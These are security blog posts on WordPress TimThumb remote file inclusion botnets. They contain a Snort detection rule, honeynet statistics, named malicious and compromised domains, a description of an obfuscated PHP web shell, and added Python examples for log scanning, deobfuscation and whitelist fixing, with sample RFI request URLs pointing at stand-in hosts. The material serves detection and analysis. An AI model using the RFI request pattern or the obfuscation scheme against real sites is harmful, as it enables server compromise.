Posts tagged WordPress

SUC029 : WordPress TimThumb RFI Web Scanner/Robot

  • Use Case Reference : SUC029
  • Use Case Title : WordPress TimThumb RFI Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : ByroeNet scanners variant
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible correlations:

Sources:

ZATAZ SIG 1010050 triggers are :

  • URI should contain “wp-content” and “php?src=http”
  • The source port can be any, from $EXTERNAL_NET towards $HTTP_SERVERS on $HTTP_PORTS.
  • Threshold is configured to count 1 occurrence in 30 seconds for the same source IP.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ZATAZ Timthumb.php - ACCESS - posssible WordPress-Attack"; flow:established,to_server; uricontent:"wp-content"; nocase; uricontent:"php?src=http"; nocase; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; sid:1010050; priority:3; rev:1;)
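The same two uricontent conditions and the per-source "limit" threshold of SIG 1010050, applied to web server access logs instead of IDS traffic, as an added example that is not part of the original post. The log lines are constructed (reserved example addresses and domains), and the threshold emulation assumes lines arrive in time order, as Snort would see the packets.

```python
import re
from datetime import datetime

# Constructed Apache combined-log lines, not real honeynet data.  The src=
# hostnames use the "whitelisted domain as prefix" pattern the posts describe,
# on reserved example domains.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Nov/2011:10:00:01 +0100] "GET /wp-content/themes/demo/timthumb.php?src=http://picasa.com.example.test/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Nov/2011:10:00:05 +0100] "GET /wp-content/themes/demo/timthumb.php?src=http://picasa.com.example.test/y.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Nov/2011:10:00:40 +0100] "GET /blog/wp-content/themes/demo/timthumb.php?src=http://blogger.com.example.test/z.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Nov/2011:10:00:06 +0100] "GET /wp-content/themes/demo/timthumb.php?src=HTTP://example.test/a.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Nov/2011:10:00:07 +0100] "GET /wp-content/uploads/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:\S+) (\S+) [^"]*"')
WINDOW_SECONDS = 30   # threshold: type limit, count 1, seconds 30, track by_src
LIMIT_COUNT = 1

def parse_line(line):
    """Return (source_ip, timestamp, uri) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    return m.group(1), ts, m.group(3)

def matches_sig_1010050(uri):
    """Both uricontent checks of the rule, case-insensitive (nocase)."""
    u = uri.lower()
    return "wp-content" in u and "php?src=http" in u

def scan(log_text):
    """Emulate the rule's 'limit' threshold: at most LIMIT_COUNT alerts per
    source IP per WINDOW_SECONDS window; further hits from that source are
    suppressed until the window expires.  Returns the (ip, uri) pairs that alert."""
    alerts, windows = [], {}          # ip -> [window_start, alerts_in_window]
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed or not matches_sig_1010050(parsed[2]):
            continue
        ip, ts, uri = parsed
        w = windows.get(ip)
        if w is None or (ts - w[0]).total_seconds() >= WINDOW_SECONDS:
            w = windows[ip] = [ts, 0]   # open a fresh 30-second window
        if w[1] < LIMIT_COUNT:
            w[1] += 1
            alerts.append((ip, uri))
    return alerts
```

On the sample, the second hit from 203.0.113.7 (4 seconds after the first) is suppressed, the one 39 seconds later opens a new window and alerts, and the logo.png request never matches.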
SIG 1010050 1 week events activity

SIG 1010050 1 month events activity

SIG 1010050 1 year events activity

1 month TOP 10 source IPs for SIG 1010050

WordPress TimThumb Botnets Spread Status


Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as a botnet recruitment vector and has now spread across multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs' visitors, distribution of spam and phishing campaigns, DDoS, and the hacking of other web sites (such as the About.us domain name registrar). Some of these infected WordPress installs were controlled by well-known C&C servers used and shared by black hats from around the world.

We are now almost six months after the discovery of the vulnerability, and a status of the WordPress TimThumb botnets can be drawn up. Are the botnets still active? Are fewer WordPress blogs vulnerable? Is the peak of the spread over? We will try to answer these questions through an analysis of all the WordPress TimThumb vulnerability exploitation attempts against our honeynet. The data collected through our honeynet represents only a small part of the real activity of the WordPress TimThumb botnets, but it can serve as an extrapolation of that activity.

List of all detected infected domains

The following table gives the complete list of all detected infected domains that were called during the WordPress TimThumb RFI attack, with the IP address associated with each domain, the country where the blog was hosted, the number of distinct source IPs that called the domain during the RFI attack, and the lifetime of the domain name.

We have a total of 202 affected domains. “blogger.com.dollhousedelights.com”, hosted in Vietnam, was the affected domain called by the most distinct source IPs (258), followed by “picasa.com.xpl.be” with 152 distinct source IPs, and in third place “blogger.com.midislandrental.com” with 110 distinct source IPs.

“picasa.com.xpl.be” and “picasa.computergoogle.co.cc” have the longest lifetime with 105 days, followed by “wordpress.com.hostdail.com” and “blogger.com.pasbar.com” with 72 days.

Infected blogs country distribution

The following graphs (Chart 1, Chart 2) show the geographic distribution of the infected blogs.

We have a total of 31 different countries for 202 affected domains. The United States is in first position with 58.9% (129) of all infected blogs, followed by Australia, Canada and the United Kingdom, each with 3.7% (8) of all infected blogs.

Infected blogs country distribution by number of source IPs

The following graphs (Chart 3, Chart 4) show the geographic distribution of the infected blogs by number of distinct source IPs that called them.

We have a total of 1734 distinct source IPs for 202 affected domains and 31 different hosting countries. The United States is in first position with 48.5% (841), followed by Vietnam with 14% (243), Indonesia with 4.7% (82) and Taiwan with 4.1% (71).

Timeline by day of infected blog calls and source IPs

The following timeline (Chart 5) shows, per day, the number of calls to infected blogs and the number of source IPs.

November 2011 was the most active month by number of source IPs, and in December the number of source IPs decreased drastically. During the first half of November the number of calls to infected blogs increased day after day; since 22 November the number of infected blogs has stabilized but is not decreasing.

Geographic timeline by day of all source IPs

In this geographic time map we load data from a Google Spreadsheet (published here). This data comes from our honeynet and represents the geographic WordPress TimThumb botnet activity from 15-09-2011 to 03-12-2011.

AfterGlow representation of the WordPress TimThumb botnets

By clicking on the following link, you can download an AfterGlow representation of the WordPress TimThumb botnets with the links between each node.

Conclusion

WordPress TimThumb botnets are still infecting new blogs, but the associated activity has been decreasing since the second half of December. Maybe the black hats are still on holiday :) My personal opinion is that we will continue to hear about these botnets throughout 2012.

About.US Domain Names Registrar Owned


During some analysis of the WordPress TimThumb botnet, I discovered that a .US domain registrar known as “About.US” is completely compromised, and has been since at least 15 September. Some RFI (Remote File Inclusion) scripts that exploit the WordPress TimThumb vulnerability call, in an obfuscated way, a hidden file “stun.jpg” on the “About.US” web site.

This “stun.jpg” file is itself obfuscated and is identified as PHP shell malware by 3/20 anti-viruses on Jotti, 3/36 on VirusScan and 3/43 on VirusTotal. The obfuscation is applied 10 times with nested gzinflate(str_rot13(base64_decode())) calls. After deobfuscation, the revealed code is a PHP web shell named “[ STUNSHELL #unknown @ ByroeNet ]”. You can find this PHP web shell with a simple Google dork.
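An analyst-side routine that peels the layered gzinflate(str_rot13(base64_decode())) wrapper described above, as an added example that is not part of the original post and is not the malware sample itself. The wrapper pattern and the 10-layer sample are constructed here around a harmless payload; PHP's gzdeflate/gzinflate are raw DEFLATE, which is what the negative zlib window size selects.

```python
import base64
import re
import zlib

# One eval(gzinflate(str_rot13(base64_decode('...')))) layer, whitespace-tolerant.
WRAPPER = re.compile(
    rb"eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\("
    rb"\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)\s*\)\s*;"
)

# Byte-wise equivalent of PHP str_rot13(): only A-Z and a-z are rotated,
# the binary deflate bytes outside those ranges pass through unchanged.
ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

def wrap_once(code: bytes) -> bytes:
    """Add one layer the way the obfuscator does: gzdeflate -> str_rot13 -> base64."""
    comp = zlib.compressobj(wbits=-15)              # raw deflate == PHP gzdeflate()
    deflated = comp.compress(code) + comp.flush()
    blob = base64.b64encode(deflated.translate(ROT13))
    return b"<?php eval(gzinflate(str_rot13(base64_decode('" + blob + b"')))); ?>"

def unwrap_once(code: bytes):
    """Peel one layer; return None when no wrapper is present."""
    m = WRAPPER.search(code)
    if not m:
        return None
    deflated = base64.b64decode(m.group(1)).translate(ROT13)
    return zlib.decompress(deflated, -15)           # raw inflate == PHP gzinflate()

def deobfuscate(code: bytes, max_layers: int = 50):
    """Peel wrapper layers until plain code remains; returns (code, layer_count).
    max_layers guards against a sample that nests forever or is self-referential."""
    layers = 0
    while layers < max_layers:
        inner = unwrap_once(code)
        if inner is None:
            break
        code, layers = inner, layers + 1
    return code, layers

# Constructed benign payload, wrapped 10 times like the sample in the post.
SAMPLE_PLAIN = b"<?php echo 'constructed harmless sample'; ?>"

def build_sample(layers: int = 10) -> bytes:
    code = SAMPLE_PLAIN
    for _ in range(layers):
        code = wrap_once(code)
    return code
```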

As you know, exploiting the WordPress TimThumb vulnerability requires some extra technical infrastructure, such as the ability to create domain names or subdomains containing:

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com

Isn't it easy to create such domains or subdomains if you own a domain name registrar!

WordPress TimThumb Botnet Visualization and Status


In a previous blog post I demonstrated that the WordPress TimThumb RFI vulnerability is used as a botnet recruitment vector. One month has passed since that blog post, and two and a half months since our honeynet started gathering events about this botnet.

So far we have seen 30 different domains, related to 37 different IP addresses, used to infect vulnerable WordPress installs (see table below).

These 30 different domains are for now related to 370 IP addresses that are most likely infected WordPress installs. Here is a representation of what is linked to what.

You can also find, by clicking on the following link, a geolocalization time map of all the related IP addresses.

WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector


On 1 August 2011, Mark Maunder revealed, through a defacement experience, that the “timthumb.php” script, included in hundreds of WordPress themes, was vulnerable to a remote file inclusion (RFI) attack. TimThumb is a small PHP script for cropping, zooming and resizing web images (jpg, png, gif).

The default configuration of the “timthumb.php” script, in many WordPress themes, allows remote file inclusion from the following domains:

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com

Unfortunately the domain verification code was buggy, allowing remote file inclusion if one of the above domain strings appeared anywhere in the hostname, for example: picasa.com.zataz.com.
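The bug class just described beside a hardened check, as an added example that is not TimThumb's actual source: the buggy version accepts any hostname that merely contains a whitelisted domain string, the fixed version parses the URL and requires the host to be the whitelisted domain or a subdomain of it on a label boundary. The sample URLs are constructed; picasa.com.zataz.com is the example from the post.

```python
from urllib.parse import urlsplit

# Default TimThumb allowed sites, as listed in the post.
ALLOWED_SITES = [
    "flickr.com", "picasa.com", "blogger.com", "wordpress.com",
    "img.youtube.com", "upload.wikimedia.org", "photobucket.com",
]

def buggy_is_allowed(src: str) -> bool:
    """Substring test anywhere in the hostname: the flawed check the post
    describes (modelled on the bug, not copied from TimThumb)."""
    host = (urlsplit(src).hostname or "").lower()
    return any(site in host for site in ALLOWED_SITES)

def fixed_is_allowed(src: str) -> bool:
    """Accept only http(s) sources whose host is exactly a whitelisted domain
    or a subdomain of one; 'picasa.com.zataz.com' and 'notpicasa.com' both fail."""
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)

def compare(srcs):
    """Return {src: (buggy_verdict, fixed_verdict)} to show where the checks differ."""
    return {s: (buggy_is_allowed(s), fixed_is_allowed(s)) for s in srcs}

# Constructed inputs: one legitimate source, then hostnames that only contain
# a whitelisted string, and a non-http scheme.
SAMPLES = [
    "http://www.picasa.com/photo.jpg",
    "http://picasa.com.zataz.com/shell.php",
    "http://notpicasa.com/shell.php",
    "ftp://picasa.com/photo.jpg",
]
```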

To create such DNS entries you need control over a zone hosted on a DNS server, so the attack vector is more complex than a simple RFI attack, which doesn't need this kind of resource.

For a few weeks now, I have observed through my honeynet that attempts to exploit this vulnerability are increasing and that it is now fully integrated as a dork into ByroeNet-like tools. The fact is that more and more exploitable DNS entries are being created, allowing the TimThumb vulnerability to be exploited.

For example, one of the most active TimThumb vulnerability domains is currently “picasa.com.xpl.be”, which has the following details:

  • RFI IP : 98.158.186.250
  • RFI FQDN : 90.158.186.250.static.midphase.com
  • RFI Country : United States

The authoritative domain name servers for the “picasa.com.xpl.be” and “xpl.be” domain names are:

; AUTHORITY SECTION:
xpl.be.			81644	IN	NS	ns2.afraid.org.
xpl.be.			81644	IN	NS	ns3.afraid.org.
xpl.be.			81644	IN	NS	ns1.afraid.org.
xpl.be.			81644	IN	NS	ns4.afraid.org.

;; ADDITIONAL SECTION:
ns1.afraid.org.		508	IN	A	67.19.72.206
ns2.afraid.org.		206	IN	A	174.37.196.55
ns3.afraid.org.		26	IN	A	72.20.15.61
ns4.afraid.org.		26	IN	A	174.128.246.102

afraid.org is a provider of free DNS hosting, dynamic DNS hosting, static DNS hosting, and subdomain and domain hosting services.

The xpl.be domain name was registered on 5 April 2010 through Key-Systems GmbH, a German domain name registrar, and the registration information is:

Registrant
Name : Dolores Aleman
Organisation : Dolores Aleman
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Registrant technical contacts
Name : Mr XpL
Organisation : XpL inc
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Both “picasa.com.xpl.be” and “xpl.be” are hosted on IP 98.158.186.250 at midPhase.com, a hosting service provider, but this hosting provider doesn't offer any free hosting services. Also, as you can see below, the xpl.be web site designer knows ASCII art.

Another example is “picasa.compress.cu.cc”, registered on “cu.cc” on 13 September 2011 by “[email protected]”. The domain name and website are hosted at 50Webs.com, a free DNS and hosting provider.

“picasa.computergoogle.co.cc”, registered at the “co.cc” registrar on 22 September 2011 by “[email protected]”. The domain name and website are hosted at 50Webs.com, a free DNS and hosting provider.

“wordpress.com.daliacarella.com”, registered at “www.000domains.com” on 17 July 2011 by “[email protected]”. The domain name and the website are hosted at HostDime.com.

“blogger.com.donshieldphotography.com”, registered at Visual Solutions Group Inc on 19 January 2011 by “Don Shield Photography”. The domain name and the website are hosted at Visual Solutions Group Inc. “www.donshieldphotography.com” seems to be a legitimate web site, but the Visual Solutions Group Inc infrastructure also seems compromised.

“blogger.com.aptum.nu”, registered at nunames.nu on 24 October 2006 by “[email protected]”. The domain name and the website are hosted at ODERLAND. “aptum.nu” seems to be a legitimate web site.

“blogger.com.jewelhost.co.uk”, registered at 123-reg.co.uk on 04 May 2010 by “Callum Baillie”. The domain name and the website are hosted at JewelHost.co.uk, a hosting provider that seems to be compromised.

“blogger.com.tara-baker.com”, registered at Tucows Domains on 07 January 2010 by “UK2.net”. The domain name and the website are hosted at VC-Hosting.com, a hosting provider that seems to be compromised.

“picasa.com.marcialia.com.br” has its domain name and website hosted at SERVER4YOU, a hosting provider that offers a free 6-month hosting trial. marcialia.com.br seems to be a legitimate web site; the account seems to be compromised.

Other domains that are also participating in the TimThumb botnet: “picasa.com.crimecyber.tk”, “blogger.com.1h.hu”, “picasa.com.nixonmu.com”, “blogger.com.lionsurveys.com”, “blogger.com.autoelectricahernandez.com”.

There are also “picasa.com.throngbook.com” and “blogger.com.cursos.secundariatecnica33.org”, which are currently down.

All these compromised sites seem to be related to the Indonesian Byroe.net network.

Below you can find some live stats on the TimThumb vulnerability exploitation attempts detected by our honeynet.
